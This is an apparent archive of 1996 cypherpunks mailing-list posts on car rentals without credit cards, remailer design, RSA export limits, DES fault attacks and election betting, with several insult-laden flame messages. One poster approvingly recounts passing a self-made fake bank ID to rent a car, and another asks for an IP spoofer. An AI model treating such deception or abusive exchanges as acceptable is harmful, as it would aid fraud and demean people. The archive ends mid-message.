To: cypherpunks@toad.com
Subject: Mondex -Reply
Message-ID: <s26969ae.002@zed.ca>
MIME-Version: 1.0
Content-Type: text/plain


>>> Anonymous <nobody@replay.com>  10/19/96, 12:00am >>>
Timothy C. May must have been sharing needles with a rabid hedgehog.

To Anonymous

Just as a matter of interest, my own personal interest, what type of
society do you come from?  The insults are not the type normally
originating from a person of the American type culture as these
insults would mean nothing to the average American. I have been to
places where people give serious concern to such statements but I
doubt many people in those places read this list and I doubt anyone
on this list does anything but delete your messages.  But, please
give me a hint where you developed this classy style of insulting the
character of Mr T. C. May.

Normally Lurkin

Raymond





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 19 Oct 1996 20:14:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Car Rental: Refusal to take Check Cards
In-Reply-To: <Pine.SUN.3.94.961019134233.19884H-100000@polaris>
Message-ID: <2Pu3VD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:
<a bunch of very interesting stuff>
> Although I pointed out that a customer can likewise stop payment on a
> credit charge, it appears that while the credit card issuers must adhere
> to a standard requirement for dispute resolution (between merchant and
> issuing bank) check cards often have no standard dispute resolution system
> or no system at all.  This leaves the recourse to negotiations between
> rental car company and consumer.  This often results in collection
> procedures.  (Read, expensive)

If the customer has a dispute with the merchant and follows certain
procedures, s/he has a great many rights. S/he gives up those rights
by not following the proper procedures. Most people don't realize this
when they have a dispute.

...
> One would assume that on the spot clearing methods (digital cash) would
> solve this problem.  Just TRY, however, to rent a car with real cash.

The folks who blew up the World Trade Center rented their van with cash.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 19 Oct 1996 23:53:53 -0700 (PDT)
To: Steve Schear <hallam@ai.mit.edu>
Subject: Re: is there no end to AP & Creative Wiretap Arguments? [RANT]
In-Reply-To: <v02130500ae8d2b880b82@[10.0.2.15]>
Message-ID: <3269C2D9.28E2@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Steve Schear wrote:
> >Steve Schear wrote:

[snip]

> >If you read the US declaration of Independence it is very clear that its
> >authors rejected natural law arguments. The rights that they hold to be
> >"self evident" are extreemly abstract principles which could be
> >justified within almost any ethical system. The removal of the word
> >"God" was deliberate and reflects a concious rejection of the natural
> >law argument.

I read the DOI, and its meaning was clear. It stated that while people are disposed to 
put up with the excesses of govt. to a certain bearable extent, that when the govt. 
tilted toward totalitarianism, the people should revolt. How can you say "Self Evident" 
and "extremely abstract" in the same context?  Self evident merely means that when you 
subtract out the factors of disinformation that are applied in political/economic areas 
to guarantee the cash flow to the bosses, you can see clearly that nobody has a Right, 
"divine" or whatever, to rule someone else.  It's not abstract, religious, or anything. 

Think of the analogy in sound reproduction.  The salesman is trying to tell you that 
perfect reproduction doesn't exist, so you should consider that $20,000 system to be 
like a "very fine musical instrument".  On the other hand, your finely-tuned mind is 
aware that there is an "true original" sound that you're trying to reproduce, and 
whether it's 100% attainable is not the relevant issue. In other words, don't let the 
bosses confuse you with their rhetoric, if you're well-read and intelligent, you should 
be able to trust your own instincts.  That's what self-evident means.

As to the removal of "God", they said "...endowed by their Creator...", and I think that 
Creator when capitalized is more than clear, i.e., "God".  Almost all of the signers 
were Freemasons, whose membership requires belief in God (although I don't know that 
they require extensive testing as to how their members conceptualize God), and so it 
would appear that the exclusion of the term God would be more an act of conciliation or 
even superstition than a rejection of anything.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Lawrence <foodie@netcom.com>
Date: Sat, 19 Oct 1996 23:26:21 -0700 (PDT)
To: Scott McGuire <cypherpunks@toad.com
Subject: Re: Usenet and Re: extortion via digital cash
In-Reply-To: <v03007808ae8a44011806@[207.167.93.63]>
Message-ID: <v03007803ae8f880b59c9@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 AM -0400 on 10/20/96, Scott McGuire wrote:

> I've been thinking about the use of Usenet as a message pool and this
>seems to
> be a good place to bring up my thoughts.  As an already existing, widely
> disseminated and easily used message pool, Usenet is very valuable to us.
>I'm
> concerned that it may not last though.  Many people now complain about
>how low
> the signal to noise ratio is (even more than they complain about this list).
> I've heard people say that they have given up on newsgroups in favor of
>mailing
> list, web-zines, etc.  So, if it gets too bad, might it just fade away?
>Or, if
> it remains but becomes unpopular, will it be easy to restrict if we use
>it for
> anonymous messages?

IMHO, it will end up similar to the late night infomerical spots on TV.
Not puch of value there, but bored people will still look.

Any effort to regulate it will come from a tangent; IDs of some sort
to post in public, or have access to the net, or screening it out of
the hypothetical InfoBahn II networks,  or similar.

> Not long ago on this list some people discussed possible changes to Usenet
> involving the elimination of newsgroups and their replacement with a
>searching
> system (ie. show me all articles with "cypherpunks" as a keyword).  Has this
> gone anywhere?  I was thinking that this could be done in a way as to be
> compatible with current implementations.  A server could be written which
>would
> act like an nntp server if connected to on the nntp port, but which would
>work
> differently internally.  When an nntp client makes a request regarding some
> news group, say alt.anonymous.messages, the server would search its single,
> unsorted pool of articles for all with "alt.anonymous.messages" in the
> newsgroup field of the header and respond to the request.  Clients
>written for
> the new server would have access to its enhanced features (whatever they
>end up
> being).

Would the concept of moderated forum have to go away, too? People could
look for messages signed by the moderator, but the overhead inherent in
validating keys could make that unusable.

The transition would be messy, once (if) two parallel systems were in
place. Many people using the new system would start tagging messages
with newsgroup names, of course, but the breakdown effect of lots of
people posting messages that seem to go straight to the void would have
a negative impact on the whole thing.

Something similar to the namespace pollution problem large companies
see with resumes would also start to happen, only in a much more
shameless form (Spam, the Next Generation).

Once enough specific search terms emerged as coherent analogues to
groups, this might be functional, though.

> Although this does not have any direct crypto relevance, preserving Usenet as
> an anonymous message pool seems like a good idea to me.  And to preserve
>it as
> an anonymous message pool, it needs to be kept useful for its other uses. I'm
> willing to work on this but I don't have the experience to lead an
>effort.  So,
> is anyone interested or is anyone already working along these lines?

I'm interested. I see a lot of problems, though, with implementation
details, especially while both the old and the new exsist side by side.

Something more akin to _Islands In The Net_ style data havens seems more
workable, but with obvious disadvantages...

-j

--
"I'm about to, or I am going to, die. Either expression is used."
                - Last words of Dominique Bouhours, Grammarian, 1702
____________________________________________________________________
Jamie Lawrence   mailto:jal@cyborganic.net  mailto:foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 19 Oct 1996 15:24:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Mondex
Message-ID: <199610192224.AAA14863@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Ray was right, Vulis. Eat your lithium.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott McGuire <svmcguir@syr.edu>
Date: Sat, 19 Oct 1996 21:09:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Usenet and Re: extortion via digital cash
In-Reply-To: <v03007808ae8a44011806@[207.167.93.63]>
Message-ID: <ML-2.2.845786098.7349.scott@homebox.>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> wrote:
> At 11:01 PM -0400 10/15/96, Rabid Wombat wrote:
> 
> >Also - in order to communicate back to the perpetrator, the victim needs
> >to communicate to the first step in the chain. The operator of that chain
> 
> BlackNet-type pools eliminate the chain. There is no "first step in the
> chain," only a message pool or Usenet group which is propagated to tens of
> thousands of sites around the world (and even available via one's satellite
> dish and local cable, a la DirectPC, @Home, etc.).
> 

I've been thinking about the use of Usenet as a message pool and this seems to
be a good place to bring up my thoughts.  As an already existing, widely
disseminated and easily used message pool, Usenet is very valuable to us.  I'm
concerned that it may not last though.  Many people now complain about how low
the signal to noise ratio is (even more than they complain about this list). 
I've heard people say that they have given up on newsgroups in favor of mailing
list, web-zines, etc.  So, if it gets too bad, might it just fade away?  Or, if
it remains but becomes unpopular, will it be easy to restrict if we use it for
anonymous messages?

Not long ago on this list some people discussed possible changes to Usenet
involving the elimination of newsgroups and their replacement with a searching
system (ie. show me all articles with "cypherpunks" as a keyword).  Has this
gone anywhere?  I was thinking that this could be done in a way as to be
compatible with current implementations.  A server could be written which would
act like an nntp server if connected to on the nntp port, but which would work
differently internally.  When an nntp client makes a request regarding some
news group, say alt.anonymous.messages, the server would search its single,
unsorted pool of articles for all with "alt.anonymous.messages" in the
newsgroup field of the header and respond to the request.  Clients written for
the new server would have access to its enhanced features (whatever they end up
being).

Although this does not have any direct crypto relevance, preserving Usenet as
an anonymous message pool seems like a good idea to me.  And to preserve it as
an anonymous message pool, it needs to be kept useful for its other uses. I'm
willing to work on this but I don't have the experience to lead an effort.  So,
is anyone interested or is anyone already working along these lines?

>
... stuff deleted ...
>
> --Tim May
> 
> "The government announcement is disastrous," said Jim Bidzos,.."We warned
> IBM that the National Security Agency would try to twist their
> technology." [NYT, 1996-10-02]
> We got computers, we're tapping phone lines, I know that that ain't
> allowed.
---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 


--------------------
Scott V. McGuire <svmcguir@syr.edu>
PGP key available at http://web.syr.edu/~svmcguir
Key fingerprint = 86 B1 10 3F 4E 48 75 0E  96 9B 1E 52 8B B1 26 05






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 20 Oct 1996 00:31:00 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Car Rental: Refusal to take Check Cards
In-Reply-To: <Pine.SUN.3.94.961019134233.19884H-100000@polaris>
Message-ID: <Pine.SUN.3.91.961020002744.24426A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 19 Oct 1996, Black Unicorn wrote:
 
> Curious about this policy I went out to rent a few cars this
> week with a new check card from a local D.C. bank.
> 
> Here were my results:
> 
> Avis: Refused
> Hertz: Refused initally, but accepted after coaxing
> Thrifty: Refused
> National: Refused
> Alamo: Refused, got quite impolite after coaxing
> Enterprise: Accepted, but only because the teller barely spoke english
> Dollar: Closed

In San Francisco, my experience has been different.  I have used
a Visa debit (check) card to rent cars from both Enterprise and
Thrifty (and maybe Dollar, I don't remember how I paid for that
one).  No one even blinked.  (It's a "gold" debit card, but I 
doubt that makes any difference.)  Maybe it's a regional thing.

> Just TRY, however, to rent a car with real cash.
> ...
> Cash is dead.

TRUE STORY--I've used cash to rent vehicles a couple of times,
though not recently.  The most interesting was on a trip to 
Arizona a dozen years, or so, ago.  I flew into Phoenix and
needed transportation up to Flagstaff.  I didn't have ANY credit
cards at the time.

When I went to the car rental counter, I didn't mention my lack
of credit cards before the young woman behind the counter had
filled out all the forms.  I wanted her to have an investment in
the transaction.  When she asked for my credit card, I told her
I didn't have one and would make a cash deposit.  I had plenty of
extra cash for that purpose.  Evidently, she had never done a 
cash transaction.  She told me that I would have to make a 
deposit of $30 (!) and would need two forms of photo ID.

Well, I had a California license and no other official ID.  I 
asked her if a company ID would suffice.  When she said it would,
I pulled out the "Bank Courier" ID card I had made with my own
two little hands.  It had my signature, description, photo and 
this legend on the back:

	"This identification not valid without 
	  red bank seal stamped on reverse."

Tho rental clerk read the legend, turned the card over, saw the
faint red bank seal stamp, nodded her head and processes the
rental agreement.

For $30, I was the keys for a brand new car worth thousands of 
dollars.  I was within 200 driving miles of the Mexican border.
After I drove away, I realized that the woman had been so 
flustered by the cash transaction that she had forgotten to have
me sign the rental agreement.  (Upon returning the car the next
day, I pointed out the omission to her and asked if she would 
like for me to sign then.  In a low conspiratorial voice she 
ernestly asked me to do so.  Life is strange.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 02:24:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Question: OTP
Message-ID: <199610200949.CAA15108@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:30 PM 10/19/95 -0500, "Robert J. Shueey" <rshueey@tcgcs.com> wrote:
>ok, not to drag this disscussion out, but apparently I am missing something.

What you're missing is that the IPG guy is a troll.
The reason there are contradictions is that he's making the stuff
up as he goes along.  Maybe he's having a good time.  Maybe he's a
tentacle of the spammer pretending to be D..V.. 

On the other hand, the POTP folks are serious.  Wrong, but serious,
actually selling a product and trying to convince other people to
include it in their email systems.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 02:25:54 -0700 (PDT)
To: William Davidheiser <wgd@netcom.com>
Subject: Re: Writing A Remailer
Message-ID: <199610200949.CAA15111@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:06 AM 10/20/96 -0700, William Davidheiser <wgd@netcom.com> wrote:
>Hi all. I want to try to write a re-mailer that will run on my ISP's UNIX
>shell account. I am familiar with Windows socket programming (C/C++) but
>have never done anything in the UNIX environment.
>
>Any pointers on where I should start?

I'd start by looking at the existing remailers, and thinking about the
problems they're trying to solve and the service objectives they have.
Mixmaster code is easy to find, and I've got my own modified ghio2 somewhere
under my web page (idiom.com/~wcs/remailer, probably).  Freedom remailer is 
another Type 1.  Nymservers are trying to solve a different, and harder,
problem.

Writing a remailer that solves a slightly different problem than the others
is a good thing to do.  For instance, a remailer that's useful at work,
such as one that decrypts PGP mail and forwards it inside the domain,
or one that only sends mail to the suggestion box account,
could gain acceptance and help add respectability for remailers.

I don't remember if code for the Winsock remailer is available, but it
works by fetching mail from a POP3 server and remailing it out SMTP servers.

Also, you could benefit from feedback from people who used to run remailers
and have switched to other code or quit.  The usual problem is abuse,
whether it's spam posted to the net, mailbombing victims, or forging
mail/postings
from victims to lists/newsgroups that will generate flames in response.

Any blocking code you can write is good - you definitely need to be able
to block by source, destination, and Subject:, and grepping message bodies
may help.
Limiting source and destination to pre-approved lists is also a good feature.
Good code for auto-detecting attacks would help, e.g. shutting down
or blocking if you get more than N messages for a given source or 
destination in a given time period, with a tolerable user interface
for the administrator.

You also need to integrate with encryption - PGP is the obvious choice
(it'll be _so_ much easier when PGP 3.0 comes out, as we've been saying
for the last couple of years :-) but S/MIME or SSL may also be good.
I'd recommend having the default behaviour be to refuse non-encrypted mail -
otherwise, any eavesdropper can compromise your system.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 02:25:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: IP: - Biham/Shamir Differential Fault Analysis of DES, etc
Message-ID: <199610200950.CAA15117@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:45 PM 10/18/96 -0700, John Gilmore <gnu@toad.com> wrote:
>Note that this attack requires physical access to the DES chip, to
>stress it so it will fail.  It works great against "tamper-proof"
>devices such as smart cards.  It doesn't work against encryption
>happening at any distance from the attacker (e.g. across the network).

It's probably most useful for defeating attempts to force smart cards
on the public as the government's solution to Key Recovery 
(e.g. Clipper 4 fails, so after the election they come out with Clipper 5
or the Anti-Terrorism Airplane Traveller's License Smartcard.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 20 Oct 1996 02:25:29 -0700 (PDT)
To: peng-chiew low <pclow@pc.jaring.my>
Subject: Re: RSA 1024bit Key for Export
Message-ID: <199610200950.CAA15120@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:26 AM 10/19/96 +0700, you wrote:
>Just a short question :
>What is the exportable maximum key length of RSA if
>use for encrypting session keys? My local Cylink VAR
>in Malaysia says it is 1024bit for encrypting the
>Omega algo.

There isn't one well-defined limit that applies to everything.
You still need to ask for permission, and they still have arbitrary
power to grant or not grant it, though they have some guidelines
about what they will usually approve and what they usually won't.*

I've seen 512-bits as the usual number, but the session key
has to be for a weak symmetric-key cypher like RC4/40.
They probably wouldn't approve 512-bit keys for encrypting
session keys to be used with triple-DES or IDEA or RC4/256.

Cylink may have permission to use 1024 bits in some specific
export-approved product (I'm guessing that's what Omega is?),
but that isn't something you can get approved for general use,
unless the NSA has relaxed a bit under pressure.

Padgett's response on coderpunks wasn't really relevant - 
the section he was quoting was for authorization-protecting
systems only (e.g. protecting PINs), explicitly saying
that it wasn't for encrypting files or text, which would
affect session keys used to encrypt files or text. 

(*They also have guidelines about how fast they will usually
approve or reject things, but they still haven't approved or rejected
Raph's application for exporting the RSA T-shirts after a year, and the
shirts are now semi-obsolete because the RSA implementations are
shorted now :-)


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk
  Imagine if three million people voted for somebody they _knew_,
  and the politicians had to count them all.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Sat, 19 Oct 1996 23:28:44 -0700 (PDT)
To: cypherpunks@toad.com (A list infested with an asshole virus)
Subject: Re: [PGP] Re: FYI - Biham/Shamir Differential Fault Analysis of DES, etc.
In-Reply-To: <199610200035.UAA11609@porky.athensnet.com>
Message-ID: <9610200654.AA07226@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text



This is obviously just more of dimitri's bullshit. 
The only thing that should have been taken seriously about the
post is that it illustrated well why he has no fucking place
on this list. You can't argue with mean spirited stupidity,
and I wouldn't even try if I were you, it's a waste of packets,
much like dimitri's presence on the net.


Tim Scanlon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Sat, 19 Oct 1996 21:30:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Writing A Remailer
In-Reply-To: <2.2.32.19961020160623.006ba1a8@netcom18.netcom.com>
Message-ID: <199610200456.GAA16658@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


William Davidheiser <wgd@netcom.com> wrote:

> Hi all. I want to try to write a re-mailer that will run on my ISP's UNIX
> shell account. I am familiar with Windows socket programming (C/C++) but
> have never done anything in the UNIX environment.
>
> Any pointers on where I should start?

ftp://ftp.replay.com/pub/replay/pub/remailer


and if you want to do unix programming, www.linux.org and follow the
links to Linux Documentation Project.  Similarly for www.freebsd.org.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winsock@c2.net (WinSock Remailer)
Date: Sun, 20 Oct 1996 04:40:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: anonymous oddsman
Message-ID: <199610201140.EAA08317@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



A quickie post-debate-update from the oddsman.

Looks like Ladbroke House is still heavy on Clinton, with prices
the same as last time, William Hill and Ladbroke's have now agreed
on a {bearish} number for Dole, but the strange disparity in Perot
odds remains. The oddsman still seeks a Moscow correspondent for
UK arbitrage opportunities. Possible nym soon, so stay tuned.

              Prices @ 09:10 BST Sat 18th Oct 96
        +---------+----------------+----------------+
        |         |  Ladbroke's    | William Hill   |
        +---------+----------------+----------------+
        | Clinton | No bets taken  |      1:16      |
        | Dole    |     7:1        |      7:1       |
        | Perot   |    50:1        |    500:1       |
        | Browne  | Not currently offered by either |
        +---------+----------------+----------------+
        | Phone   | +44-800-524524 | +44-800-444040 |
        | Numbers:|                |                |
        +---------+----------------+----------------+

The oddsman's roving reporter can't get any reply on the phone from
Coral, so they may be out of the running on this year's horse race.
I'll keep you posted -- 'till next post-time. 
anonymous oddsman

"Demeaning the integrity of the U.S. Presidential election process
for you on a regular basis, at no charge."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 20 Oct 1996 05:19:53 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Car Rental: Refusal to take Check Cards
In-Reply-To: <2Pu3VD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.94.961020081749.22115E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 19 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Black Unicorn <unicorn@schloss.li> writes:
> <a bunch of very interesting stuff>
> > Although I pointed out that a customer can likewise stop payment on a
> > credit charge, it appears that while the credit card issuers must adhere
> > to a standard requirement for dispute resolution (between merchant and
> > issuing bank) check cards often have no standard dispute resolution system
> > or no system at all.  This leaves the recourse to negotiations between
> > rental car company and consumer.  This often results in collection
> > procedures.  (Read, expensive)
> 
> If the customer has a dispute with the merchant and follows certain
> procedures, s/he has a great many rights. S/he gives up those rights
> by not following the proper procedures. Most people don't realize this
> when they have a dispute.
> 
> ...
> > One would assume that on the spot clearing methods (digital cash) would
> > solve this problem.  Just TRY, however, to rent a car with real cash.
> 
> The folks who blew up the World Trade Center rented their van with cash.

I said car.  It's very difficult.

No one really wants to steal those big yellow vans.  For some reason theft
or damage of of those is not a serious problem and a good portion of their
business is students moving who do not have estlablished credit yet.

Go try it out.  Renting cars with cash, while possible, is extremely
difficult.

> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 20 Oct 1996 05:32:41 -0700 (PDT)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Car Rental: Refusal to take Check Cards
In-Reply-To: <Pine.SUN.3.91.961020002744.24426A-100000@crl3.crl.com>
Message-ID: <Pine.SUN.3.94.961020082112.22115F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Sat, 19 Oct 1996, Black Unicorn wrote:
>  
> > Curious about this policy I went out to rent a few cars this
> > week with a new check card from a local D.C. bank.
> > 
> > Here were my results:
> > 
> > Avis: Refused
> > Hertz: Refused initally, but accepted after coaxing
> > Thrifty: Refused
> > National: Refused
> > Alamo: Refused, got quite impolite after coaxing
> > Enterprise: Accepted, but only because the teller barely spoke english
> > Dollar: Closed
> 
> In San Francisco, my experience has been different.  I have used
> a Visa debit (check) card to rent cars from both Enterprise and
> Thrifty (and maybe Dollar, I don't remember how I paid for that
> one).  No one even blinked.  (It's a "gold" debit card, but I 
> doubt that makes any difference.)  Maybe it's a regional thing.

I think it might be.  Many of the D.C. and Virginia rental agencies I
tried had big signs indiciating they didn't accept check/debit cards.
(Note that the minimum age for car rental varies by region too, suggesting
that corporate policy adjusts to the market needs/risks).

> > Just TRY, however, to rent a car with real cash.
> > ...
> > Cash is dead.
> 
> TRUE STORY--I've used cash to rent vehicles a couple of times,
> though not recently.

[...]

> For $30, I was the keys for a brand new car worth thousands of 
> dollars.  I was within 200 driving miles of the Mexican border.
> After I drove away, I realized that the woman had been so 
> flustered by the cash transaction that she had forgotten to have
> me sign the rental agreement.  (Upon returning the car the next
> day, I pointed out the omission to her and asked if she would 
> like for me to sign then.  In a low conspiratorial voice she 
> ernestly asked me to do so.  Life is strange.

Yes, I managed to entirely controvert the "no check card" policy at
Enterprise because the teller was clueless.  Unfortunately, depending on
this kind of thing if you have no credit card can be tricky.

> 
>  S a n d y
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 20 Oct 1996 08:10:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [PGP] Re: FYI - Biham/Shamir Differential Fault Analysis of DES, etc.
In-Reply-To: <9610200654.AA07226@vampire.science.gmu.edu>
Message-ID: <keL4VD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim Scanlon <tfs@vampire.science.gmu.edu> writes:

>
> This is obviously just more of dimitri's bullshit.

Tim (using a different last name) is lying.

I did not write the anonymous article about Matt Blaze.
I think it was written by Tim May, who's trying to blame all
sorts of garbage on me.

> The only thing that should have been taken seriously about the
> post is that it illustrated well why he has no fucking place
> on this list. You can't argue with mean spirited stupidity,
> and I wouldn't even try if I were you, it's a waste of packets,
> much like dimitri's presence on the net.
>
>
> Tim Scanlon

Timmy May and his supporters have no place on any forum related to
cryotpgraphy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: h2@juno.com (Michael B Amoruso)
Date: Sun, 20 Oct 1996 05:59:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: IP spoofer
Message-ID: <19961020.085324.9814.0.h2@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone got a good IP spoofer that can spoof the whole domain?  The only
shit I can find is those shitty ones that spoof the first part of the
IDENTD which is possible to do in mIRC if you use it.  Oh yeah, it has to
be for Win95.  Yes I know that no one likes win95 but I dont have a
choice....I'll tell about that later.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Davidheiser <wgd@netcom.com>
Date: Sat, 19 Oct 1996 10:32:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Writing A Remailer
Message-ID: <2.2.32.19961020160623.006ba1a8@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all. I want to try to write a re-mailer that will run on my ISP's UNIX
shell account. I am familiar with Windows socket programming (C/C++) but
have never done anything in the UNIX environment.

Any pointers on where I should start?

Thx a bunch ---
        billd





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sun, 20 Oct 1996 09:17:43 -0700 (PDT)
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Car Rental: Refusal to take Check Cards
In-Reply-To: <Pine.SUN.3.94.961020082112.22115F-100000@polaris>
Message-ID: <199610201621.JAA22267@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know about car, but I had been able to rent bicycles and roller
blades (2 other viable forms of transportations) with no difficulty
at all using cash. They did not even ask for a credit card at all.

Only once did they ask for a credit card, but they did not run anything
through or make any calls when I checked the bike out; when I returned
it, they gave me the original credit card slip (plus all copies) when
I gave them cash to settle. 

If I wanted to, I could have run the credit card account dry and then 
rode off to nowhere. The bike was probably worth 1000 to 1500 dollars.

Mark Allyn
allyn@allyn.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 20 Oct 1996 09:30:20 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: RE: Goodbye [NOSTALGIA]
Message-ID: <01BBBE6A.C75B97A0@king1-04.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Dale Thorn

C'mon now, you guys sound like a bunch of old men, groaning over the checkers board 
about how you can't keep track of the six or seven medications you take every day.
........................................................................


I was not complaining about an inability for keeping track of the list traffic. 

Neither was I bemoaning the fact that things change or go out of use, nor discussing the nature of true invention, nor seeking after general judgements on pinnacles per se.

None of my statements were in reference to things per se, but only as they relate to the cypherpunks, to the present circumstance of the S/N ratio, and to James A. Donald's conclusions about the list.


   ..
Blanc
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Sun, 20 Oct 1996 09:32:00 -0700 (PDT)
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Vulis' Trash
Message-ID: <01BBBE6A.CB385CA0@king1-04.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Black Unicorn

I'm I the only one who is sick of Vulis' trash?
.......................................................................
 

No.  How often can a person open up a message only to read:

	 "Look, see how cleverly I put words of
	 comparison and degradation in conjunction
